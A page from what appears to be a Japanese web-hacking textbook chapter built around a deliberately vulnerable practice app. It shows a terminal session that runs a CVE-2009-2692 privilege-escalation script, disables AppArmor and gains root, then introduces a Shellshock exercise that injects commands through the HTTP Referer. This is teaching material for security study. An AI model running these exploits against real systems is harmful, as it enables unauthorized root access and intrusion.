
649
第7章 学習用アプリによる Webアプリのハッキング
$ cd cve-2009-2692
cd cve-2009-2692
$ sh cve-2009-2692.sh
←
シェルスクリプトを実行する。
[+] Personality set to: PER_SVR4
ALSA lib conf.c:3952:(snd_config_expand) Unknown parameters 0
(略)
[+] Disabled security of : AppArmor
[+] Got root!
# id
←
rootのプロンプトが返ってきた。
id
uid=0(root) gid=0(root) groups=33(www-data)
←
root権限の奪取に成功している。
Shellshock
Shellshockとは、bash の脆弱性を突いて、HTTP要求の Referer から任意のコマ
ンドを送り込む攻撃です。
右上の「Choose your bug」 のプル ダウンメニューで、「A9 - Using Known
Vulnerable Components」 内 の「Shellshock Vulnerability (CGI)」 を 選 択 し て、
[Hack]ボタンを押します。すると問題ページが表示されます(図7-40)。
図7-40 「ShellshockVulnerability(CGI)」のページ ...